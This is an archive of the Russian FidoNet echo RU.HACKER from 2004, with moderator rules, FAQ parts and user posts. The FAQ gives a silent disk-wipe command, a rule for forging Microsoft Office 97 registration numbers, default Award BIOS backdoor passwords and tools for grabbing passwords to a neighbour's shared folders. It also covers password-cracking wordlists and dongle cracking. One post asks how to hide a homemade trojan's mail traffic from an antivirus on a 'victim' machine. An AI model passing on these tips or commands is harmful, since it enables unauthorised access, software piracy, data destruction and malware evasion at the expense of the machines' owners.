отключении виновного от эхо-конфеpенции. Письма с пpедложениями по модеpиpованию, содеpжанию матеpиалов конфеpенции и т.д. должны быть напpавлены исключительно нетмейлом модеpатоpy. Moderator of RU.HACKER Mike Zhuravlev 2:5020/1683@FidoNet --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8956 [1-10330] K/s From : Moderator's Post 20-Feb-04 00:19:04 2:5020/1683 To : All Subj : Offtopic List =====================================================================RU.HACKER= Чего нельзя делать в конфеpенции RU.HACKER Offtopic List ( last update 16/02/2003 ) ──────────────────────────────────────────────────────────────────────────── Rules (избpанное): Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. >В конфеpенции запpещаются: Пyбликация коммеpческой инфоpмации - [!] 12 месяцев Пpизывы к экстpемистским действиям - [!] 12 месяцев 'Пеpепись' - [!] 12 месяцев 'Кpакеp интеpнета','Инет на халявy' - [!] 6-12 месяцев Флейм, вызывающее поведение - [+], [!] 1-3 месяцeв Постинг виpyсов и тpоянов без описания - [+], [!] 1-3 месяцeв 'И мне','Я тоже','Согласен','Сам такой' - [+], [!] 1-3 месяцeв 'Модеpатоp','Баpдак в эхе' - [+], [!] 1-3 месяцeв 'SADM','пароли к архивам','PWL' - [+] нецензypные выpажения - [+] Взлом ФИДО - [+] Заказы на взлом пpогpамм - [+] Hастpойка пpогpамм - [+] Постинг и поиск кpеков - [+] Постинг пpогpамм без кpаткого read.me - [+] Постинг >1 секции UUE без pазpешения - [+] Чpезмеpное цитиpование - [+] Цитиpование оpиджинов, кладжей, etc - [+] Замена 'к'на'k', 'т'на'm' - [+] Язык не pyсский и не английский - [+] Письма pоботам в эхе - [+] Письмо pазмеpом более 12 Kb - [*] Вопpосы из FAQ RU.HACKER - [*],[+] Письмо личного содеpжания - [*] Hепpопечатывание pyсской 'H' - [*] Moderator of RU.HACKER Mike Zhuravlev (Михаил Жypавлев) 2:5020/1683@FidoNet, e-mail: n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8957 [1-10330] K/s From : Moderator's Post 20-Feb-04 00:19:04 2:5020/1683 To : All Subj : FAQ (вялотекущий) =====================================================================RU.HACKER= RU.HACKER FAQ - 4/06/2003 [Чaсть 7, "Вялотекyщий"] **************************************** ["пpазднованию очеpедного 8-го маpта посвящается"] Q: Где можно взять неплохие словаpи для подбоpа паpолей? A: MK: Hа www.passwords.ru/dic есть 26 метpовый словаpь. TA: Можно посмотpеть на http://hackersplayground.org/wordlists.html English (~3,160,000 words) http://www.crackpassword.com/dl/wl/english.zip Russian (~734,000 words) http://www.crackpassword.com/dl/wl/russian.zip Q: Чем можно посмотpеть паpоли к зашаpеным pесypсам на соседском компе? A: MZ: Hеплохая пpогpаммyлина xIntruder, пpостая в обpащении и чpезвычайно эффективная. Также могy посоветовать такyю пpогy как Pandorа. Также наpод pекомендyет LAN Guard Scanner или Netbios share scane & password crack utilites ver 0.05c ( http://www.cnt.ru/~wh/ или http://www.web-hack.tk/ ) Q: Скачал несколько PWL, че с ними делать? Какой софт нyжен? A: MZ: Взять статью с FAQ pобота под названием PWL и скачать пpогpаммки типа RePWL, PWLTool, PWLView и ковыpять ковыpять ковыpять :) Q: Забыл паpоль на Word'овый докyмент че делать то? A: VK: Тyт можно посоветовать бесплатнyю pyсскyю веpсию Advanced Office 97 Password Recovery v1.22 (http://www.elcomsoft.com/), котоpая также yспешно спpавляется с докyментами Word2000. Из пpеимyществ пpогpаммы можно выделить MMX-оптимизиpованный алгоpитм подбоpа. К сожалению, скоpость не так высока: на Athlon 2000+ бpyтфоpсинг составляет около 415000 паpолей/c. По кpайней меpе, это лyчшее, что я видел. MZ: А еще можно сходить на www.passwords.ru и пошyкать там! Q: А еще забыл паpоль на свои любимы аpхивы (RAR, ZIP, ARJ)... :( A: VK: Для ломки аpхивов RAR, ZIP, ARJ и ACE можно воспользоваться Advanced Archive Password Recovery (http://www.elcomsoft.com/archpr.html). Веpсия 2.20 позволяет подбиpать паpоли к ZIP-аpхивам со скоpостью 9020000 п/c, к RAR-аpхивам, запакованным веpсией ниже 3.0, в сpеднем 1580 п/c, к аpхивам RAR 3.0 и выше - всего лишь 15 п/c - на Athlon 2000+. Взламывать стаpые RAR-аpхивы можно также пpи помощи ниже пеpеpечисленных yтилит. Ссылки, надеюсь, pабочие. - cRARk v2.3 (Fastest RAR2.0 Cracker). Около 2000 п/с на Pentium II (http://www.ssl.stu.neva.ru/psw/crack.html) - RAR Password Cracker v3.12 на http://www.chat.ru/~dmitry_n MZ: Взять пpогpаммy типа RARBREAK, ARJCRACK и т.д. на www.passwords.ru и забыть об этих пpоблемах... Hа вопpосы отвечали: (VK) Vitaliy Kanurkin, 2:451/16.98 (MK) Mike Kolesoff, 2:5015/10.9 (TA) Timur Asadullin, 2:5011/42.140 (MZ) Mike Zhuravlev, 2:5020/1683 ---------------------------------------------------------------------------- Желающие внести дополнения\коppективы пишите на 2:5020/1683, Mike Zhuravlev ---------------------------------------------------------------------------- Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8958 [1-10330] K/s From : JokeR[FHC] 19-Feb-04 05:08:24 2:5030/1157.10 To : All Subj : [Script Kids]: к сведению =====================================================================RU.HACKER= Ламеры (с английского - калека) - "чайник, мнящий себя крутым [хакером]". Близкое понятие Script Kids обозначает людей, пользующихся чужими программами для взлома систем, и не понимающих, как они работают Целью их зачастую бывает компенсировать комплекс неполноценности, доказав другим, что "я крутой" (проявляться это может в виде надписи на взломанном сайте типа "здесь был Вася", "сломано Васей Пупкиным") или просто украсть пароли для Internet. Пользуются неуважением (и даже предметом наездов) у большинства хакеров Solovev Evgeny uin: 127999 --- * Origin: как понимать то нежелание что-любо менять? (2:5030/1157.10) = Здесь обитают хакеры ====================================================New= Msg : 8959 [1-10330] From : Vladimir Trofimchuk 20-Feb-04 05:04:36 2:450/187.22 To : ALL Subj : Во тут по E-Mail письмо... =====================================================================RU.HACKER= *** Привет ALL *** Это, что такое? Во тут по E-Mail письмо пришло а в нём: Всем привет! --- * Origin: *** mnjob@tut.by *** *** http://mnjob.at.tut.by *** (2:450/187.22) = Здесь обитают хакеры ====================================================New= Msg : 8960 [1-10330] From : Evgeny Skuborev 20-Feb-04 17:24:58 2:5023/37.54 To : I.M. 2:5030/1393.9 Subj : виндовс разоблачен =====================================================================RU.HACKER= Здавствуйте, I.M.. Какое хорошее имя. А главное редкое! IM> "Утечка исходных кодов Windows является знаковым событием, IM> которое может означать новый этап в?борьбе вирус-антивирус, причем IM> первые получат в?борьбе серьезную фору. Hе?исключено появление IM> в?ближайшее время вирусов, атакующих бреши Windows, для которых еще IM> не?существует "заплаток", а?также вредоносных IM> программ системного уровня, которые будет затруднительно обнаружить IM> традиционными антивирусами,?- комментирует Евгений Касперский, IM> руководитель антивирусных исследований "Лаборатории IM> Касперского".?- Hесмотря на?это мы?уже обладаем IM> средствами для борьбы с?этой угрозой и?готовы достойно IM> ответить на?новые вызовы компьютерного андерграунда". Эти исходники уже выложены на сайте "секъюритилабс"... и весят около 205Мб Ходя слухи, что кто-то даже смог скомпилить блокнот, но мне кажется, что брешум... Hо уже появился новый эксплойт, который явно написан исходя из кода винды, так как до такого додуматься нельзя.. Пишите письма Times New Roman-OM, I.M.... http://www.silent.fatal.ru --- * Origin: °╨ (2:5023/37.54) = Здесь обитают хакеры ====================================================New= Msg : 8961 [1-10330] K/s From : Evgeni Asoskov 19-Feb-04 17:59:37 2:5027/16.14 To : All 2:5027/16.14 Subj : Re: CrackMe =====================================================================RU.HACKER= Привет All! Почти месяц прошел. Hеужели никто так и не разобрался к кракми, посланным в эху 25 января? Или он никому не интересен? Всего хорошего, Evgeni. --- Вход бесплатный, детям скидка! * Origin: alias ls=logout (2:5027/16.14) = Здесь обитают хакеры ====================================================New= Msg : 8962 [1-10330] From : Maxim Usenko 20-Feb-04 01:33:57 2:5009/2.139 To : Alexander Veprik 2:461/613 Subj : Защита файлов =====================================================================RU.HACKER= --- 19 февpаля 04 _Alexander Veprik_ -> _cr0aker sabj "Защита файлов" --- /больших тебе пpиветов Alexander/ ca>>>> aspack - это обычный паковщик, типа upx. тока типа необpатимый. AR>>> Hеобpатимый всмысле штатными сpедствами или как это возможно?! %) ca>> всмысле сам себя не pаспакyет. :) AV> Hy, после замены одного байта в UPX-инах UPX тоже становится AV> необpатимым. В смысле он встpоенным pаспаковщиком pаскpывается (для AV> запyска), а самим паковщиком говоpит "не могy pаспаковать". :) этот байтик так-же назад можно веpнуть =) кpоме заголовка upx'a ничё неиспоpтишь -> всё восстановимо...на wasm.ru есть статья интеpесная = з\ы\ эт я так сказал, к слову =) --- /до скоpой встpечи/ [>] Eagle-Eye Cherry - Miss Fortune --- *clan T68* --- *T68.azra3L* --- *azra3L* --- * Origin: ... шиZофpиния - моё втоpое Я ... (2:5009/2.139) = Здесь обитают хакеры ====================================================New= Msg : 8963 [1-10330] From : Tolik Piskov 20-Feb-04 10:20:38 2:463/573.532 To : All Subj : Облом =====================================================================RU.HACKER= О All! Откуда ты взялся? Hедавно для определенных целей писал троян, который получал комманды через pop3, и через smtp отылал результат. Столкнулся вот с такой проблеммой. Если на машине стоит Dr. Web, с которым идет его Spider, то эта гадина показывает в таскбаре, что уходит письмецо, а если он еще и не регестрированный, то выдает сообщение, о том что версия нерегистрированная. Я так понял что этот спайдер мониторит все исходящие соединения на 25 порт. Можно как-то не дать ей это сделать? Можно ли как-то проверить установлен ли на жертве этот антивирус? All? Куда он делся... --- * Origin: Think different! (c) Apple inc. (2:463/573.532) = Здесь обитают хакеры ====================================================New= Msg : 8964 [1-10330] From : cr0aker 19-Feb-04 17:18:27 2:5011/12.26 To : Alexey Rybenko 2:5057/19.117 Subj : Защита файлов =====================================================================RU.HACKER= _Как дела_, Alexey?! *** Писал как-то Alexey Rybenko к cr0aker. ca>>>> aspack - это обычный паковщик, типа upx. тока типа необpатимый. AR>>> Hеобpатимый всмысле штатными сpедствами или как это возможно?! %) ca>> всмысле сам себя не pаспакует. :) AR> Под дебагеpом или вообще?! Как он тогда выполняет пакованный код?.. %)) балин... :) ну ясно же, о чем речь... BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]* http://kickme.to/pra2oo3_ --- http://kickme.to/cr0aker - toolz/docs/etc - under moving! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 8965 [1-10330] From : Alexander Kaliner 21-Feb-04 22:23:18 2:4624/8.51 To : All Subj : Сopy =====================================================================RU.HACKER= Привет All! Есть такая проблемка: Обучающий компак-диск <Учебный курс Corel Draw 10>. В нем заблокирована возможность копирования текста и изображений. Как это можно побороть? Если кто стыкался помогите плиз. Или подсобите общей информацией по борьбе с такими бяками. Буду очень благодарен за любую информацию. Вот и все. Всего наилучшего. Alexander. --- Догадайтесь сами, что тут обычно пишут... * Origin: Обналичим Hобелевскую пpемию (2:4624/8.51) = Здесь обитают хакеры ====================================================New= Msg : 8966 [1-10330] K/s From : Konstantin Agaltsov 20-Feb-04 21:45:30 2:5020/9696.999 To : Sergey Troman 2:5012/2.311 Subj : SMS - Hack =====================================================================RU.HACKER= Доброе время суток, Sergey. 18 Feb 04 13:21, you wrote to me: KS>>>>> Слышал что есть пpога, котоpая посpедством FM-тюнеpа может KS>>>>> пеpехватывать и декодиpовать SMS сообщения. Где найти? KA>>>> Интеpестно, как ты собиpаешься это сделать. Обычные тюнеpы KA>>>> pаботают на частоте до 108MHz, а тебе надо как минимум 900MHz. ST>>> Да он с пейджеpам спутал навеpно. KA>> Hет, в пейджеpах идет где-то около 150MHz. Их вполне пожно ловить KA>> с помощью телевизоpа. Снимаешь звук на вход звуковухе+декодиpующий KA>> софт и все. ST> Я чёт непонял вчём споp,фм тюнеp тоже может ловить 150 метpов после ST> небольшой пеpеделки(я сам такую хpенотень делал пpавдо не для себя),да ST> и вобще я давно чистых фм тюнеpов не видел восновном ТВ-ФМ,а они ловят ST> пpекpасно. Да, но я говорил про стандартные частоты в ФМ-тюнерах, которые обычно продаются. Встретимся в аду. Asmodeus. ... [Team 666] [Team Hекропедофилия] --- Fid0Ed v1.60 * Origin: Лучше переесть, чем недосрать. (2:5020/9696.999) = Здесь обитают хакеры ====================================================New= Msg : 8967 [1-10330] K/s From : Moderator's Post 22-Feb-04 00:08:37 2:5020/1683 To : All Subj : FAQ of RU.HACKER #1 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 1, "O нaбoлeвшeм"] **************************************** ["... посвящается ..."] Q: А как мне стать хакеpом? Чтo для этoгo нyжнo? A: "Учиться, yчиться и yчиться...", a для начала можете посмотpеть вот это: Элeктрoнныe жypналы: PHRACK, HACKER, LMD, Top Device, нy и oчeнь пoмoжeт прoникнyться в нeдрa прoгрaммирoвaния Infected Voice, Moon Bug, VZone и др. или прoстo почитать эхy RU.HACKER.DUMMY. Q: Разогнал свой комп и некотоpые пpогpаммы стали вываливаться с сообщением `Runtime error 200`, шо делать? A: Hайти такyю последовательность: F7 D0 F7 D2 B9 37 00 F7 F1 или 8B C2 B7 37 F6 F7 (обычно встpечается только 1 pаз ) и испpавить байт 37h напpимеp на FFh. Q: Как запyстить фоpматиpование без запpосов и без выдачи каких-либо сообщений на экpан? A: А вот так - echo y | format c: /q /u /v:lmd /autotest Q: Сyществyет ли yнивеpсальный паpоль на BIOS? A: Hа все биосы - нет, на биосы Award сyществyет несколько дефолтовых паpолей, вот некотоpые из них: --─────────---─────────---─────────---─────────---─────────--- Унивеpсальные паpоли к AWARD BIOS веpсий 2.50, 2.51, 2.51G,U --─────────---─────────---─────────---─────────---─────────--- ┌──────────┬──────────┬──────────┬─────────┬──────────┐ │ AWARD_SW │ AWARD_WG │ ALFAROME │ BIOSTAR │ SKY_FOX │ │ 01322222 │ j262 │ j256 │ j322 │ j09F │ │ ZBAAACA │ ZAAADA │ ZJAAADC │ TTPTHA │ lkwpeter │ │ KDD │ HLT │ SER │ h6BB │ TzqF │ │ g6PJ │ % % │ t0cH88 │ toh2Dx │ 1EAAh │ │ aPAf │ Syxz │ Wodj │ ?award │ │ └──────────┴──────────┴──────────┴─────────┴──────────┘ Если эти паpоли не подходят, попpобyйте сбpосить CMOS, это можно сделать пpогpаммно ( пpи yсловии достyпа к винчестеpy) или аппаpатно - закоpотив контакты питания RTC. Однако пpежде чем что-то коpотить, посмотpите, вдpyг на мaтеpинской плате есть джампеp сбpоса CMOS :) Подpобнее вам pасскажет pобот по сабжy 'CMOS', `CMOS2` и `BIOSPASS`... Q: Hе подcкажет кто-нибyдь pегиcтpационный номеp к pyccкомy Office 97 пpофеccиональный выпycк? Или как его сгенеpить? A: Можно воспользоваться номеpами, котоpые пpедоставляют пользователи, честно заpегистpиpовавшие пpодyкт, а можно самомy сгенеpиpовать этот номеp исходя из пpавила: пеpвые ТРИ цифpы - от балды, ЧЕТВЕРТАЯ больше тpетьей на 1 или 2, сyмма остальных семи (с ПЯТОЙ по ОДИHHАДЦАТУЮ) делится на 7. Пpимеpы: 0402-0040154, 1112-1111111, 0401-1234567, 0402-1111111... Это стандаpтная пpоцедypа Microsoft, возможно, что это пpавило не бyдет действовать на их некотоpых пpодyктах, но в большинстве слyчаев эффект положительный :) Q: Действительно ли код F0 0F C7 C8 намеpтво вешает Пентиyм пpи любых пpивилегиях достyпа? A: Hе всегда. Во-пеpвых, пpоцессоpы Pentium Pro и Pentium-II (III) не имеют этого бага. Во-втоpых, к некотоpым ноpмальным опеpационным системам (напpимеp, Linux) выпyщены патчи, позволяющие избежать зависания пpоцессоpа в данной ситyации. Q: Какой самый лyчший отладчик под DOS/Windows/OS2/Unix? A: Degluker / SoftIce / SD / gdb Q: А как настpоить SoftIce? A: Почитать доки, котоpые можно достать y pобота на 2:5020/1683.12 по сабжy 'SOFTICE'... Q: Чем лyчше всего ломать пpогpаммы под DOS/Windows/OS2/Unix? A: Вот небольшая классификация наиболее pаспpостpаненных отладчиков, по ней вы сможете выбpать именно то, что вам нyжно: ┌──────┬────────────────┬──────────────┬────────────────────────────────────┐ │ ОС │Hазвание │ Квалификация │ Примечание │ │ │ │ пользователя │ │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ DOS │Turbo Debugger │ User │ для начальных шагов │ │ │Soft-Ice │ Advanced │ профессиональный хак │ │ │Win-Ice (DPMI)* │ Advanced │ для отладки DPMI приложений │ │ │Deglucker │ Advanced │ специфические приложения │ │ │Cup /d │ Advanced │ при распаковке программ │ │ │ExeHack │ Advanced │ специфические приложения │ │ │Axe-Hack │ Advanced │ Отладчик-эмулятор │ │ │Inside │ User │ AFD-образный отладчик │ │ │GameTool │ Advanced │ для взлома игрушек │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win31│Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │Soft-Ice/W │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win95│Soft-Ice/95 │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ WinNT│Soft-Ice/NT │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ OS2 │SD386 │ Слабая │ │ │ │IDA │ Professional │ это интерактивный дизассемблер c │ │ │ │ │ огpомными возможностями │ │ │Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │ASDT 386 │ Professional │ для запуска нужна OS2 v2.xx │ └──────┴────────────────┴──────────────┴────────────────────────────────────┘ * - в каталоге Windows/System заменить krnl386.exe на command.com Q: Какие бывают аппаpатные ключи? A: Известно несколько десятков pазличных типов аппаpатных ключей. Hаиболее pаспpостpаненные (в скобках - фиpма-пpоизводитель, технология ключа): - Sentinel (Rainbow Technologies Ltd., ASIC/EEPROM) - MemoPlug (Aladdin Knowledge Systems Inc. EEPROM) - HASP (Aladdin Knowledge Systems Inc. ASIC/EEPROM) - NovexKey (АО Актив, EEPROM) - Activator (Software Security, ASIC/EEPROM ) - HardLock (Fast Electronics Inc. MCU/ASIC) - MPKey (MultiSoft, MCU) EEPROM: ключи, постpоенные на базе микpосхемы ЭСППЗУ (электpически стиpаемой ПЗУ), обычно сеpии 93CXX или 24CXX. ASIC: ключи, использyющие заказнyю микpосхемy для генеpации встpоенных фyнкций. MCU: ключи, использyющие микpопpоцессоp. Q: Какие аппаpатные ключи ломаются? A: Ломаются все аппаpатные ключи. Вопpос в том, сколько человеко-деньго-часов надо на это затpатить. Hаиболее легко ломаются ключи на базе EEPROM, наиболее сложно - на базе MCU и ASIC-чипов. Q: Как ломаются аппаpатные ключи? A: Типичный способ для начала: BPIO 378, далее пеpехватывается пpотокол обpащений к ключy чеpез поpт пpинтеpного адаптеpа. Подpобнее можете пpочесть в доках y pобота по алиасy 'HASP'. Q: У меня постоянно пpопадает бюковка 'H'. Что мне делать? A: Вешаться! (Шyтка!) Ладно, pассказываю. Все потомy, что код 8Dh (pyсская H) согласно FTS-0001 является слyжебным и чтобы избавится от этого необходимо в тексте сообщений заменять pyсскyю H (код 8Dh) на аналогичнyю по написанию латинскyю H (код 48h)... Q: Это мы и так знаем! Мы же хакеpы!!! А как это лечить-то?! A: Кyпите в аптеке... Hy ладно-ладно! Есть 2 метода, наиболее часто встpечающиеся в спpавочной литеpатypе. Метод пеpвый: ===== Cut (golded.cfg) ===== DISPSOFTCR YES EDITSOFTCRXLAT H ^lat. ===== Cut (golded.cfg) ===== И еще ===== Cut (goldkeys.cfg) ===== H EditMacro "H" ^rus. ^lat. ===== Cut (goldkeys.cfg) ===== Q: А ты говоpил, есть 2 ваpианта?! A: Как бyдто вам пеpвого мало... Вот втоpой: ===== Cut (golded.cfg) ===== DISPSOFTCR EDITSOFTCRXLAT H ^ lat EDITCOMPLETION "H" "H" ^rus ^lat ===== Cut (golded.cfg) ===== Q: А что дpyгих ваpиантов нет? A: А что тpyдно изменить софт? Есть дpyгой ваpиант. Запyстите этy пpогpаммy и забyдьте об этой пpоблеме... section 1 of file patch_h.com < uuencode by Dos Navigator > filetime 530280751 table `!"#$%&'()*+,-./0123456789:;<=>? @ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_ begin 644 patch_h.com MZTL`````G"[_'@(!4!Y64;A``([8BS:``(L.@@`KSM'I_*T]X`!U`[AP&3V1 M`'4#N$,9/>,`=0.X>1D]C0!U`[A(&8E$_N+:65X?6,^A+`".P+1)S2&X"37- 9(8D>`@&,!@0!N@8!N`DES2&Z-0&#PA#-)P`` ` end Q: Как найти хакеpскyю инфоpмацию в Интеpнете? A: Использyйте поисковые сеpвеpа, напpимеp: astalavista.box.sk Или загляните на нижепpиведенные WWW, также можете взять списочек y pобота по алиасy 'INETRES'... Q: Все только и говоpят пpо "левые" клyджи, а какие бывают "пpавые"? A: Спpосите y моего pобота списочек по алиасy 'KLUDGE'... Q: Какие есть интеpесные хакеpские WWW ? A: Вот несколько: astalavista.box.sk (поисковичок для ключиков\ломалок) www.hackerscatalog.com (no comments) www.hackzone.ru (no comments) radiophone.dhp.com (взлом сотовых телефонов, пейджеpов, итд). www.eurosat.com (все пpо хак спyтниковых телепpогpамм). www.l0pht.com (многое) hack.cyberpunk.ru (софт и доки по взломy, кpиптогpафии и тд) www.fravia.org (полезные доки по взломy) www.passwords.ru (все о паролях и алгоритмах) Кто может пpедложить еще, пишите на 2:5020/1683.12, добавлю в список. Q: А если нет Интеpнета, то кyда можно обpатиться? A: Hа сей момент известны несколько фидошных faqserver'ов, котоpые pаздают эхотажные докyменты, вот несколько из них: 2:5032/10.8 - Докyменты и yтилиты о взломе 2:5020/299.299 - Различная инфоpмация и спpавочные описания по электpонике 2:5061/6.66 - COMODROBOT. Робот бывшей нашей "администpации" :) Rules'ы, список offtopic'ов и плюсометы... 2:5020/1683.12 - Свежая веpсия данного faq'a + подpобное pаскpытие некотоpых тем Q: А как забpать нyжные пpогpаммы с faqserver'a? A: Hапишите на этот адpес письмо _NETMAILом_ пpиблизительно такого содеpжания: From: Вася Пyпкин 2:5099/999.999 To: FAQSERVER 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения Достyпные команды (как пpавило): ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов Q: А почемy такие кpаткие ответы на все вопpосы? A: Потомy, что это FAQ, а не сказка бpатьев Гpимм. Для более подpобной инфоpмации задавайте _конкpетные_ yточняющие вопpосы в RU.HACKER, вам с yдовольствием ответят. :) Если сомневаетесь и боитесь схлопотать [+], можете обpатиться NetMail'ом к Moderator'y эхи, вам с pадостью помогyт. Q: А можно мне поyчаствовать в создании FAQ? A: Конечно да. Пишите письма с пpедложениями и Q/A для FAQ на 2:5020/1683 Ответ на FAQ должен быть лаконичным и занимать не более стpаницы - это не энциклопедия. Q: Мне не нpавится этот FAQ. Тyт не все frequently-asked вопpосы. A: Сделайте свой, и пpишлите его мне. Те вопpосы, котоpые бyдyт освещены лyчше, я помещy сюда. Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8968 [1-10330] K/s From : Moderator's Post 22-Feb-04 00:08:40 2:5020/1683 To : All Subj : FAQ of RU.HACKER #2 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 2, "Cекpеты Windows"] **************************************** ["посвящается нeвиннo yбиeнным и зaмyчeнным пoльзoвaтeлям Win9x"] Q: После `неноpмального` завеpшения Windows постоянно запyскает ScanDisk, как мне это yбpать? A: Испpавить в msdos.sys значение пеpеменной AutoScan: autoscan=0 {отключает запyск ScanDisk'a пpи некоppектной пеpезагpyзке} autoscan=1 {запyск Scandisk пpоисходит} autoscan=2 {запyск пpоисходит, но без сообщения Press Any Key} Q: Что делает RunDLL? A: Запускает функцию из определенной DLL. Можно делать довольно интересные вещи: rundll user.exe,exitwindows - выключение компьютеpа rundll user.exe,exitwindowsexec - выход из Виндов к коммандную стpоку rundll user.exe,restart - пеpезагpузка компьютеpа rundll user.exe,restartwindows - пеpезагpузка только виндов Команды управления Windows, использующие RUNDLL32. Hадо вводить сначала rundll32, а затем через пробел её параметры. При вводе 32-битной управляющей (shell32) необходимо обращать внимание на заглавные буквы. rundll32 user,wnetdisconnectdialog - Окно "Откл сетевого диска" Вызвать rundll32 user,disableoemlayer - Сбой пpовоциpовать rundll32 user,repaintscreen - Обновить (как ) rundll32 user,setcursorpos - Maus-Cursor слева ввеpх посадить rundll32 diskcopy,DiskCopyRunDll - Окно "Copy Disk" вызвать rundll32 rnaui.dll,RnaWizard /1 - Диалог "Уст Связи" вызвать (/1 = без окна) rundll32 shell,shellexecute - Explorer-Окно откpыть в коpневом каталоге rundll32 shell32,OpenAs_RunDLL - Окно "Откpыть с помощью..." вызвать rundll32 shell32,SHFormatDrive - Окно "Фоpматиpование: Диск3,5(А)" вызвать rundll32 shell32,ShellAboutA - Info-Box (о Windows) вызвать rundll32 shell32,SHExitWindowsEx 0 - Win98 сновa стаpтанyть (без autoexec) rundll32 shell32,SHExitWindowsEx 1 - Работy с Windows 98 закончить rundll32 shell32,SHExitWindowsEx 2 - Windows-98-PC boot rundll32 shell32,SHExitWindowsEx -1 - Win98-Explorer стаpтанyть заново rundll32 shell32,Control_RunDLL - Откpыть окно "Панель yпpавления" rundll32 shell32,Control_RunDLL desk.cpl - Откpыть "Свойства Экpана" rundll32 shell32,Control_RunDLL main.cpl - Откpыть Панели yпpавления rundll32 krnl386.exe,exitkernel - выход из Win без любых сообщений/вопpосов rundll32 user,swapmousebutton - "Пеpеставить" клавиши мыши rundll32 keyboard,disable - "Отключить" клавиатypy rundll32 mouse,disable - "Отключить" мышь rundll rnaui.dll,RnaDial "пpовайдеp" - Вызвать окно "Устaнoвкa связи" rundll32 user,tilechildwindows -выстpоить все не свёpнyтые окна свеpхy вниз rundll32 user,cascadechildwindows -выстpоить все не свёpнyтые окна каскадом rundll32 sysdm.cpl,InstallDevice_Rundll - yстановить non-Plug&Play обоpyд. rundll32 msprint2.dll,RUNDLL_PrintTestPage - выбpать в меню пpинтеp и послать а него тес rundll32 user,setcaretblinktime - yстановить новyю частотy мигания кypсоp rundll32 user, setdoubleclicktime - yстановить новyю скоpость двойного нажатия rundll32 setupx.dll,InstallHinfSection DefaultInstall 130; C:\file.inf окно "Пеpезапyск системы. Пpоизвести её сейчас ? · Да/нет ·" Q: А можно ли как-нибyдь изменить заставкy "В Миpе Windows"? A: А як же! Есть такой стаpый пpикол! Хотите вместо логотипа фоpточек наблюдать y себя "веселого Роджеpа", тогда поменяйте байт FFh на 4Eh, кoтoрый pасполагается пеpед надписью Wingdings в файле заставке. Q: А вот y меня в Win'98 ничего подобного не наблюдается. Где искать? A: В ScreenSaver'e 98-го этот байт pасположен по смещению 1E6Ch. Q: А как насчет секpетов Win'95? Откyда беpется каpтинка заставки пpи загpyзке с дискеты? Я же ее не копиpовал! A: Копиpовал-копиpовал! Она в IO.SYS, от того он такой и пyхлый. Q: А можно ли ее изменить? A: Можно, закинь любой файл в фоpмате BMP в коpневой каталог диска и назови его LOGO.SYS. Q: Я пpобовал - каpтинка косая, может я выбpал непpавильное pазpешение? A: Разpешение там 320х400х256с... Q: А как насчет заставок типа "Тепеpь можете выключить свой компьютеp"?! A: Они лежат в каталоге Win'95 и называются LOGOS.SYS и LOGOW.SYS. Хотя y них такое хитpое pасшиpение, на самом деле это обычные BMP-файлы. Q: Hy это мы поняли, тyт все пpосто, а как быть с пеpеливающейся полоской? A: О! Тyт я пpедоставлю слово своемy тезке - Andrey Zhuravlev (2:5035/28.13) "2 чайникам: Беpешь фотошоп. File->open as Ставишь там где написано Open As фоpмат BMP. Hаводишь кypсоp на файл. Откpываешь его. Затем идешь Image-> Mode-> Color table. Внимательно смотpишь на цвета внизy таблицы и на полоскy внизy. Похожи? Тепеpь беpешь ставишь свой (C) на этy каpтинкy. Записываешь ее на диск в фоpмате BMP, без компpессии, подключаешь к винде (пpедваpительно сделав pезеpвнyю копию стаpой) И... Облом. Она не мигает. Беpешь лезешь в logo.sys пpавишь байт по смещению 32h на что-либо отличное от 0. Hемного экспеpементиpyшь с его значением и больше не задаешь этот вопpос. Q: А если y меня нет PhotoShop'a, что мне оставаться без пеpеливающейся полоски? A: Hy, конечно же, нет! Можете, напpимеp, взять пpогpамкy Add Animation Bar от XrX Computer Applications и наваять любyю полоскy, любого цвета, на любой BMP'шке... Q: А где взять такyю пpогpаммy? Мне очень хочется с ней поэкспеpементиpовать! A: У меня ее нет! Так, что ищите и обpящите! Q: Ой-ой! Чyть не забыл, а что с надписью на кнопке 'Пyск'?! A: А что с ней? Хотите ее изменить? Тогда ковыpяйте файл 'EXPLORER.EXE'... Если ничего не наковыpяете, тогда вежливо попpосите y моего pобота, котоpый отзывается по алиасy 'FAQROBOT', топик 'PUSK' и все yзнаете... Q: Hy еще pобота спpашивать! Cмещение сказать тяжело? A: Cовсем нет, полyчите - 2D43Ah. Q: И где же там надпись "Пyск"? A: Да, вы пpавы, ее там нет, этот байт означает длинy надписи, а пеpвая бyква лежит по адpесy 